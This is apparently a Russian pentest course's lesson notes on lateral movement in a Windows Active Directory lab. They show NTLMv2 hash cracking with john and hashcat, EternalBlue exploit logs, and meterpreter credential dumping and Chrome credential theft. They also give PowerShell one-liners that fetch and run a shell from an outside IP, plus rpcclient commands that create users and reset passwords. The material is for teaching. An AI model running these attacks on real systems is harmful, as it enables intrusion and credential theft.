###### tags: `module9`
[ToC]
# Занятие 5 Горизонтальное перемещение(продолжерние 4-го)
10 шагов для успешной атаки на Windows Active Directory - https://cryptoworld.su/10-shagov-dlya-uspeshnoj-ataki-na-windows-active-directory/
Active Directory глазами хакера - https://bhv.ru/product/active-directory-glazami-hakera/
Атаки на домен - https://habr.com/ru/company/jetinfosystems/blog/449278/
Серия Infrastructure PenTest: Часть 3 - Работа - https://bitvijays.github.io/LFF-IPS-P3-Exploitation.html !!!
## Видеозапись урока
{%youtube 1MBNsgCBP6E %}
### timecodes
0:00:00 Ждем
0:24:10 Вступление и общий треп
0:29:40 Разбор вчерашней практики
0:33:35 Проверяем инфру и готовимся начать
0:37:20 Twick для Kali
0:38:20 Запускаемся инфру
0:40:30 Начинаем. Теория
1:03:00 Переходим к практике
1:05:30 Ставим респондер. Снова
1:08:30 Запускаем и обсуждаем респондер.
1:13:45 Arpspoof
1:19:55 Responder. Включаем все протоколы
1:28:30 Перерыв
1:31:25 Перерыв. Окно респондера.
1:37:30 Анализ результатов респондера
1:42:05 ntlm hash теория.
1:44:15 ntlm hash !!
1:47:42 ntlm hash Переходим к практике
1:49:44 Распаковка и подготовка словаря
1:53:45 Брутфорсим по словарю johnripper.
1:57:00 Брутфорсим по маске hashcat
2:10:50 Pass-the-hash теория
2:14:20 Реверс подключение. msvenom+meterpreter
2:19:40 Подключились. Собираем локальные хэши
2:22:20 Повышаем привилегии. kiwi
2:23:25 Повышаем привилегии. windows-kernel-exploit
2:27:20 Повышаем привилегии. mfc
2:38:15 Ethernalblue
2:40:37 !! пояснения
2:41:50 Перерыв. тихо.
2:56:20 Вспоминаем что проделали
2:58:15 Используем найденный hash для подключения
3:04:20 Траблшутим path-the-hash подключение
3:09:25 !! Предположение об ошибке.
3:12:48 gather/credentials
3:14:46 !! Kerberos
3:15:28 Атака на домен
3:17:00 Kiwi !!!
3:21:20 Пробуем подключиться к домену
3:24:40 smbghost
3:27:00 Ищем как запустить smbghost
3:28:50 Переключились на другую лабу со свежим Kali (все сначала)
3:32:16 пробуем забрать модуль с другой Kali
3:34:20 Продолжаем на новой лабе
3:39:00 Пробуем smbghost снова. безуспешно
3:42:00 Ресетим win10 и пробуем снова. общий треп
3:49:20 Домашка
## Настройка лабы
### Схема стенда для лабораторной работы
Продолжаем использовать стенд из [4-го занятия](https://hackmd.io/@jaberez/ByYCisC3K)
## Разбор полученных хэшей
как получить hash'и, [можно почитать тут](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
По результатам прежнего урока мы уже собрали ряд хэшей.
Используя инструменты такие как john-the-ripper и hashcat мы можем их преобразовать если нам повезет или хватит времени в пароли.
```
┌──(root💀kali)-[/home/user/responder/logs]
└─# ls -ll
Analyzer-Session.log
Poisoners-Session.log
SMBRelay-Session.txt
Config-Responder.log
Proxy-Auth-NTLMv2-192.168.1.15.txt
SMB-Relay-SMB-192.168.1.15.txt
HTTP-NTLMv2-192.168.1.15.txt
Responder-Session.log
```
### johntheripper
Тут все очень просто, собранные респондером файлы хэшей уже готовы для использования приложением и достаточно просто запустить приложение и указать файл с хэшами.
```
┌──(root💀kali)-[/home/user/responder/logs]
└─# john HTTP-NTLMv2-192.168.1.15.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 2 different salts (1.5x same-salt boost) (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
qwe556T! (Administrator)
qwe556T! (Administrator)
qwe556T! (Administrator)
3g 0:00:00:01 DONE 2/3 (2022-01-16 10:31) 3.000g/s 12404p/s 13434c/s 20151C/s 123456..ralph
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
```
По умолчанию используется свой файл с паролями, но мы можем использовать и свой словарь.
:exclamation: John работает только с CPU отсюда и проигрыш в скорости в сравнении с hashcat, но для перебора словарей его вполне хватает.
### hashcat
https://www.4armed.com/blog/perform-mask-attack-hashcat/
Используя эту утилиту мы можем уже использовать не только словарь но и брутфорс по маске.
hashcat ./HTTP-NTLMv2-192.168.1.15.txt -m 5600 -a 3 -O -w 2 ?l?l?l?d?d?d?u?s
-m тип хэша в нашем случае это ntlmv2, его номер у hashcat 5600
-a тип атаки, в нашем случае 3 это перебор по маске
-w тип профиля приложения в нашем случе это 2 - normal
-O включить оптимизацию
?l?l?l?d?d?d?u?s - маска (l[ow], d[igit], u[p], s[ymbols] подробности в помощи к приложени.
hashcat ./HTTP-NTLMv2-192.168.1.15.txt -m 5600 -a 3 -O -w 2 -1 ?l?d?u -i --increment-min=8 --increment-max=12 ?1?1?1?1?1?1?1?1?1?1?1?1
-i разрешаем диапазон длин для пароля
--increment-min минимальная длина пароль, с которой начнеться перебор
--increment-max максимальная.
-1 в этом случае мы создаем свой уникальный набор символов, который объединил в себе l[ow], d[igit] и u[p] набор символов, который потом используеся в маске.
?1?1?1?1?1?1?1?1?1?1?1?1 в место 1 в процессе перебора будут подставляться символы из набора - буквы большие и маленькие и цифры от 0 до 9.
```
PS C:\Hacking\hashcat-6.1.1> .\hashcat.exe ./hash.txt -m 5600 -a 3 -O -w 4 ?l?l?l?d?d?d?u?s
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 2.1 AMD-APP (3188.4)) - Platform #1 [Advanced Micro Devices, Inc.]
=====================================================================================
* Device #1: Hawaii, 4032/4096 MB (3264 MB allocatable), 40MCU
OpenCL API (OpenCL 1.2 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #2: Intel(R) Celeron(R) CPU G1620 @ 2.70GHz, skipped
* Device #3: Intel(R) HD Graphics, 1336/1400 MB (350 MB allocatable), 6MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 27
INFO: All hashes found in potfile! Use --show to display them.
Started: Sun Jan 16 18:01:51 2022
Stopped: Sun Jan 16 18:01:52 2022
PS C:\Hacking\hashcat-6.1.1> .\hashcat.exe --show
ADMINISTRATOR::HACKERU:fbca4e6d9741b077:087828f522511a4193ab7435959660bc:010100000000000056b7c3e0780ad8010982f349b632e29d000000000200080048004f003900440001001e00570049004e002d00430031004700340046004e00300032004e00480056000400140048004f00390044002e004c004f00430041004c0003003400570049004e002d00430031004700340046004e00300032004e00480056002e0048004f00390044002e004c004f00430041004c000500140048004f00390044002e004c004f00430041004c0008003000300000000000000000000000003000007249fd40e4b2e3981cf914844b2f82b425539548bc80645acf9b91415d4b5b550a001000000000000000000000000000000000000900120048005400540050002f0077007000610064000000000000000000:qwe556T!
ADMINISTRATOR::HACKERU:0be4bfc21d81ddf0:7150ed1d4f485dfd74625351c7ade99a:010100000000000085b239e2780ad801f6a7170b9c8cec79000000000200080048004f003900440001001e00570049004e002d00430031004700340046004e00300032004e00480056000400140048004f00390044002e004c004f00430041004c0003003400570049004e002d00430031004700340046004e00300032004e00480056002e0048004f00390044002e004c004f00430041004c000500140048004f00390044002e004c004f00430041004c0008003000300000000000000000000000003000007249fd40e4b2e3981cf914844b2f82b425539548bc80645acf9b91415d4b5b550a001000000000000000000000000000000000000900120048005400540050002f0077007000610064000000000000000000:qwe556T!
```
Пароль успешно найден.
## Атаки
### EternalBlue
EternalBlue использует уязвимости SMBv1 для вставки вредоносных пакетов данных и распространения вредоносных программ по сети . Эксплойт использует то, как Microsoft Windows обрабатывает или, скорее, неправильно обрабатывает специально созданные пакеты от злоумышленников.
Пробуем подключиться к рабочей станции используя эту уязвимость.
```
[*] 192.168.1.15:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.15:445 - Sending all but last fragment of exploit packet
[-] 192.168.1.15:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.
```
Возможно это вызвано тем, что параллельно был запущен impacket-smbrelayx и перехватил подключение у eternalblue. Выключил и повторил команду.
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 192.168.1.15:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.15:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.15:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.15:445 - The target is vulnerable.
[*] 192.168.1.15:445 - Connecting to target for exploitation.
[+] 192.168.1.15:445 - Connection established for exploitation.
[+] 192.168.1.15:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.15:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.15:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.1.15:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.1.15:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.1.15:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.15:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.15:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.15:445 - Starting non-paged pool grooming
[+] 192.168.1.15:445 - Sending SMBv2 buffers
[+] 192.168.1.15:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.15:445 - Sending final SMBv2 buffers.
[*] 192.168.1.15:445 - Sending last fragment of exploit packet!
[*] 192.168.1.15:445 - Receiving response from exploit packet
[+] 192.168.1.15:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.15:445 - Sending egg to corrupted connection.
[*] 192.168.1.15:445 - Triggering free of corrupted buffer.
[-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.15:445 - Connecting to target for exploitation.
[+] 192.168.1.15:445 - Connection established for exploitation.
[+] 192.168.1.15:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.15:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.15:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.1.15:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.1.15:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.1.15:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.15:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.15:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.15:445 - Starting non-paged pool grooming
[+] 192.168.1.15:445 - Sending SMBv2 buffers
[+] 192.168.1.15:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.15:445 - Sending final SMBv2 buffers.
[*] 192.168.1.15:445 - Sending last fragment of exploit packet!
[*] 192.168.1.15:445 - Receiving response from exploit packet
[+] 192.168.1.15:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.15:445 - Sending egg to corrupted connection.
[*] 192.168.1.15:445 - Triggering free of corrupted buffer.
[-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.15:445 - Connecting to target for exploitation.
[+] 192.168.1.15:445 - Connection established for exploitation.
[+] 192.168.1.15:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.15:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.15:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.1.15:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.1.15:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.1.15:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.15:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.1.15:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.15:445 - Starting non-paged pool grooming
[+] 192.168.1.15:445 - Sending SMBv2 buffers
[+] 192.168.1.15:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.15:445 - Sending final SMBv2 buffers.
[*] 192.168.1.15:445 - Sending last fragment of exploit packet!
[*] 192.168.1.15:445 - Receiving response from exploit packet
[+] 192.168.1.15:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.15:445 - Sending egg to corrupted connection.
[*] 192.168.1.15:445 - Triggering free of corrupted buffer.
[-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
```
Не смотря на позитивный тест, подключиться все равно не получилось.
При этом атакованная рабочая станция начал сильно лагать, перегрузить штатно не получилось. Пришлось выключать.
>[FINGER] OS Version : Windows 7 Professional 7601 Service Pack 1
[FINGER] Client Version : Windows 7 Professional 6.1
Тоже повторилось и при повторном тесте.
:octagonal_sign: В момент второй и третьей попытки рабочая станция повисла, а после и перегрузилась. Eternalblue выдал следующие строки
```
[-] 192.168.1.15:445 - SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.
[*] Exploit completed, but no session was created.
```
### Pass-The-Hash
https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
:::info
С точки зрения пентестинга:
:exclamation: Вы МОЖЕТЕ выполнять атаки Pass-The-Hash с хешами NTLM .
:exclamation: Вы НЕ МОЖЕТЕ выполнять атаки Pass-The-Hash с хешами Net-NTLM .
:::
Для того что бы выполнять эту атаку нам необходимо получить локальные NTML, а для этого, как вариант, мы можем подключившись к компьютеру их сохранить к себе.
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
https://ethicalhackingguru.com/the-complete-ntlm-relay-attack-tutorial/
## Пост эксплуатация
### Получение учетных записей
Если мы получили метерпретер сессию к удаленному компу, то можем использовать комнады и модули meterpreter'a для сбора информации. .
Как вариант подключения мы можем использовать способ описанный [тут](https://hackmd.io/6B1fJE07S6u4vgwIlqtm1w?view#smbrelayx-SMB-relay-NTLMv2).
#### hashdump
Подключившись мы можем получить необходимые дампы командой `hashdump`. В этот раз получилось, так как атакуемый пользователь обладает правами администратора.
```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4707155ad2a1c0c09c05cd2577dbb203:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user:1001:aad3b435b51404eeaad3b435b51404ee:100d1b20b208ff5a02e788f80bfb1256:::
```
Теперь рассмотрим, что если бы получили подключение к машине за которой сидит пользователь. Представим, что наш пользователь получил и выполнил наш реверсшел.
Загрузим на win7 наш backdoor.exe с прошлого урока. Загрузить можем используя временный http сервер питона. `python -m SimpleHTTPServer`
На стороне Kali перезапустим наш эксплойт командой `run` после разрыва прежнего подключения.
Снова выполним `hashdump`
```
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter >
```
:heavy_exclamation_mark: если windows русский помогает эта команда `chcp 65001 `
#### kiwi module
https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz
load kiwi
help
creds_all
Модуль gather в meterpreter
#### post/../gather
Можно попробовать модули пост обработки(post) для сбора(gather).
Вытаскиваем SAM базу
run post/windows/gather/hashdump
Вытаскиваем ntds
run post/windows/gather/domain_hashdump
Есть модули и для сбора учетных данных(credentials)
```
meterpreter > run post/windows/gather/credentials/credential_collector
[*] Running module against WIN7
[-] Error accessing hashes, did you migrate to a process that matched the target's architecture?
```
Можем попробовать получить учетные данные броузера доступных пользователей. В нашем случае, только атакованного пользователя
```
meterpreter > run post/windows/gather/credentials/chrome
[*] Filtering based on these selections:
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true
[-] Error loading USER S-1-5-21-1713449786-424582426-4167065957-1001: Profile doesn't exist or cannot be accessed
[-] Error loading USER S-1-5-21-1713449786-424582426-4167065957-500: Profile doesn't exist or cannot be accessed
[-] Error loading USER S-1-5-21-236004864-1829554240-97714527-500: Profile doesn't exist or cannot be accessed
[*] Chrome's Cookies file found
[*] Downloading C:\Users\j\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
[*] Chrome Cookies downloaded
[+] File saved to: /root/.msf4/loot/20220116141249_default_192.168.1.15_chromeCookies_444116.bin
[+] File with data saved: /root/.msf4/loot/20220116141249_default_192.168.1.15_EXTRACTIONSCooki_146699.bin
[*] Chrome's Login data file found
[*] Downloading C:\Users\j\AppData\Local\Google\Chrome\User Data\Default\Login Data
[*] Chrome Login data downloaded
[+] File saved to: /root/.msf4/loot/20220116141250_default_192.168.1.15_chromeLoginData_510025.bin
[+] File with data saved: /root/.msf4/loot/20220116141250_default_192.168.1.15_EXTRACTIONSLogin_457927.bin
[*] Chrome's History file found
[*] Downloading C:\Users\j\AppData\Local\Google\Chrome\User Data\Default\History
[*] Chrome History downloaded
[+] File saved to: /root/.msf4/loot/20220116141251_default_192.168.1.15_chromeHistory_332011.bin
[*] no such column: lower_term
[*] PackRat credential sweep Completed
meterpreter >
```
:::spoiler или другие из списка
meterpreter > post/windows/gather/credentials/
post/windows/gather/credentials/aim
post/windows/gather/credentials/ie
post/windows/gather/credentials/seamonkey
post/windows/gather/credentials/avira_password
post/windows/gather/credentials/imail
post/windows/gather/credentials/securecrt
post/windows/gather/credentials/bulletproof_ftp
post/windows/gather/credentials/imvu
post/windows/gather/credentials/skype
post/windows/gather/credentials/chrome
post/windows/gather/credentials/incredimail
post/windows/gather/credentials/smartermail
post/windows/gather/credentials/comodo
post/windows/gather/credentials/kakaotalk
post/windows/gather/credentials/smartftp
post/windows/gather/credentials/coolnovo
post/windows/gather/credentials/kmeleon
post/windows/gather/credentials/spark_im
post/windows/gather/credentials/coreftp
post/windows/gather/credentials/line
post/windows/gather/credentials/srware
post/windows/gather/credentials/credential_collector
post/windows/gather/credentials/maxthon
post/windows/gather/credentials/sso
post/windows/gather/credentials/digsby
post/windows/gather/credentials/mcafee_vse_hashdump
post/windows/gather/credentials/steam
post/windows/gather/credentials/domain_hashdump
post/windows/gather/credentials/mdaemon_cred_collector
post/windows/gather/credentials/tango
post/windows/gather/credentials/dynazip_log
post/windows/gather/credentials/meebo
post/windows/gather/credentials/teamviewer_passwords
post/windows/gather/credentials/dyndns
post/windows/gather/credentials/miranda
post/windows/gather/credentials/thunderbird
post/windows/gather/credentials/enum_cred_store
post/windows/gather/credentials/mremote
post/windows/gather/credentials/tlen
post/windows/gather/credentials/enum_laps
post/windows/gather/credentials/mssql_local_hashdump
post/windows/gather/credentials/tortoisesvn
post/windows/gather/credentials/enum_picasa_pwds
post/windows/gather/credentials/nimbuzz
post/windows/gather/credentials/total_commander
post/windows/gather/credentials/epo_sql
post/windows/gather/credentials/opera
post/windows/gather/credentials/trillian
post/windows/gather/credentials/filezilla_server
post/windows/gather/credentials/operamail
post/windows/gather/credentials/viber
post/windows/gather/credentials/flashfxp
post/windows/gather/credentials/outlook
post/windows/gather/credentials/vnc
post/windows/gather/credentials/flock
post/windows/gather/credentials/postbox
post/windows/gather/credentials/windows_autologin
post/windows/gather/credentials/ftpnavigator
post/windows/gather/credentials/pulse_secure
post/windows/gather/credentials/windows_sam_hivenightmare
post/windows/gather/credentials/ftpx
post/windows/gather/credentials/purevpn_cred_collector
post/windows/gather/credentials/windowslivemail
post/windows/gather/credentials/gadugadu
post/windows/gather/credentials/qq
post/windows/gather/credentials/winscp
post/windows/gather/credentials/gpp
post/windows/gather/credentials/razer_synapse
post/windows/gather/credentials/wsftp_client
post/windows/gather/credentials/heidisql
post/windows/gather/credentials/razorsql
post/windows/gather/credentials/xchat
post/windows/gather/credentials/icq
post/windows/gather/credentials/rdc_manager_creds
post/windows/gather/credentials/xshell_xftp_password
:::
### Получение учетных записей домена
Как получить [дамп хэшей паролей домена](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/).
Сбор [учеток в Active Directory](https://xakep.ru/2020/03/20/windows-ad-harvesting/). Как искать критически важные данные при атаке на домен.
### CMD/Powershell
если у нас есть шел до комьтера, то мы може получить полезную информацию и командами cmd, например:
sysinfo
whoami /all
ipconfig
Ипользую powershell команды можно
Скачать файлы
PowerShell.exe -c "Invoke-WebRequest -Uri http://10.10.15.136:9090/shell.exe -outfile C:\Users\svc_backup\Desktop\temp\shell.exe"
PowerShell.exe -c "Invoke-WebRequest -Uri http://10.10.15.136:9090/shell.ps1 -outfile C:\Users\svc_backup\Desktop\temp\shell.ps1"
Запустить файл на выполнение
PowerShell.exe -c "import-module C:\Users\svc_backup\Desktop\temp\shell.ps1"
### Enum4linux
https://labs.portcullis.co.uk/tools/enum4linux/
https://kali.tools/?p=5257
https://defcon.ru/penetration-testing/12816/
Enum4linux — это инструмент для перечисления информации из систем Windows и Samba.
Программа написана на Perl и в своей основе представляет собой обёртку вокруг инструментов из пакета Samba: smbclient, rpclient, net и nmblookup. Поэтому вам нужно будет установить пакет Samba в качестве зависимости.
Ключевые функции:
+ RID cycling (когда RestrictAnonymous установлено на 1 в Windows 2000)
+ Вывод списка пользователей (когда RestrictAnonymous установлено на 0 в Windows 2000)
+ Вывод информации о членстве в группе
+ Перечисление общих ресурсов
+ Определение, хост в рабочей группе или в домене
+ Идентификация удалённой операционной системы
+ Получение политики паролей (используя polenum)
Получение списка общих ресурсов с контроллера домена
enum4linux -S 192.168.1.100
Получение списка пользователей с контроллера домена
enum4linux -U 192.168.1.100
Вариант «Делать все»
enum4linux -a 192.168.1.100
Если мы уже смогли получить уже даже пользовательскую учетку, то мы сможем получить гораздо больше информации от контроллера домена
enum4linux -u user -p '123qwe' -a 192.168.1.100 2>/dev/null
### smbclient
https://bestestredteam.com/2019/03/15/using-smbclient-to-enumerate-shares/
SMBClient используется для подключения с smb шарам, но можно также использование для перечисления общих ресурсов
smbclient -L 192.168.1.100 (анонимное подключение)
smbclient //192.168.1.100/<sharename>
smbmap -u anonymous -H 192.168.1.100 -r 'profiles$' | grep 2020 | awk -F ' ' '{print $8}' > users.txt (получить список)
```
┌──(root💀kali)-[/home/user]
└─# smbclient -L //192.168.1.15/C -W hackeru -U administrator 1 ⨯
Enter HACKERU\administrator's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.1.15 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
копирование файлов с удаленной машины
smbclient //10.10.10.192/forensic -U audit2020
smb: \> prompt off
smb: \> recurse on
smb: \> mget commands_output
### smbmap
https://hackware.ru/?p=11040#312
SMBMap позволяет пользователям перечислять диски общего доступа samba по всему домену. Программа составляет список совместных дисков, прав доступа на диск, общее содержимое, имеет функциональность выгрузки/загрузки, автоматическую загрузку файлов, имя которых совпадает с образцом и даже возможность удалённого выполнения команд. Этот инструмент был создан для тестирования на проникновение и предназначен для упрощения поиска потенциально чувствительных данных в крупных сетях.
smbmap -u anonymous -H 192.168.1.100 -r 'profiles$'2
### rpcclient
rpcclient — утилита для запуска на стороне клиента функций MS-RPC и я вляется частью пакета samba.
rpcclient утилита изначально разработанная для тестирования функциональности в самой Samba. Она пошла несколько этапов развития и стабильности. Сегодня многие системные администраторы пишут с помощью этой утилиты скрипты для управления Windows NT клиентом на рабочих станциях UNIX.
https://smb-conf.ru/rpcclient-command-line-ms-rpc-client.html
https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html
https://linux.die.net/man/1/rpcclient
https://linuxcommandlibrary.com/man/rpcclient
rpcclient -U "" 10.10.10.192 (Проверим возможность нулевой сессии)
enumdomusers (перечисление пользователей в домене)
enumprivs (перечисление привилегий)
enumdomgroups (перечисление доменных групп)
setuserinfo2 {{username}} 23 'new_password' (сброс пароля на пользователя, но не выше твоих же привилегий) - источник https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P3-Exploitation.html
queryuser {{username|rid}} (информация о пользователе)
createdomuser {{username}} (создание нового пользователя в домене)
rpcclient --user {{domain}}\{{username}}%{{password}} {{ip}} (подключние к удаленному хосту)
rpcclient --user {{username}} --workgroup {{domain}} --no-pass {{ip}} (подключние к удаленному хосту без пароля)
rpcclient --user {{domain}}\{{username}} --pw-nt-hash {{ip}} (подключние к удаленному хосту передав хэш пароля)
rpcclient --user {{domain}}\{{username}}%{{password}} --command {{semicolon_separated_commands}} {{ip}} (выполнить команды оболочки на удаленном хосте)
ASRep Roasting (атака)
При атаке ASRep Roasting, сервер имеет три разных ответа:
хеш пароля пользователя;
у данного пользователя не выставлено UAF Dont Require PreAuth;
такого пользователя нет в базе Kerberos.
Таким образом, мы сможет узнать, существует пользователь или нет
GetNPUsers.py BLACKFIELD.LOCAL/ -dc-ip 10.10.10.192 -no-pass -usersfile /root/HTB/blackfield/users.txt -outputfile hash.txt
В файле вывода если найдутся легитимные пользователи будут хэши
### evil-winrm
https://www.hackingarticles.in/evil-winrm-winrm-pentesting-framework/
Эту программу можно использовать на любых серверах Microsoft Windows с включенной этой функцией (обычно через порт 5985), конечно, только если у вас есть учетные данные и разрешения на ее использование. Таким образом, мы можем сказать, что его можно использовать на этапе взлома/пентестирования после эксплуатации. Цель этой программы — предоставить приятные и простые в использовании функции для взлома. Системные администраторы также могут использовать его в законных целях, но большинство его функций сосредоточены на взломе/пентестировании.
Функции
+ Совместимость с клиентскими системами Linux и Windows
+ Загрузить в память сценарии Powershell
+ Загружать в память dll-файлы в обход некоторых антивирусов
+ Загружать в память сборки C# (C Sharp) в обход некоторых антивирусов
+ Загрузите полезные нагрузки x64, сгенерированные с помощью потрясающей техники пончиков.
+ Обход AMSI
+ Поддержка передачи хэша
+ Поддержка аутентификации Kerberos
+ Поддержка SSL и сертификатов
+ Загружать и скачивать файлы с индикатором выполнения
+ Список удаленных машинных служб без привилегий
+ История команд
+ Завершение команды WinRM
+ Завершение локальных файлов
+ Раскрашивание подсказок и выходных сообщений (можно отключить по желанию)
+ Поддержка Docker (готовые образы доступны на Dockerhub)
+ Захват ловушек, чтобы избежать случайного выхода из оболочки по Ctrl+C
## Повышение привелегий
https://github.com/SecWiki/windows-kernel-exploits
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
## Прячем наше присутсвие
### Прячем наш выход в интеренет
SSLH: Прячем [SSH/HTTPS/OpenVPN/Telegram за единым портом](https://habr.com/ru/post/412779/) 443
Sign in with Wallet
Connect another wallet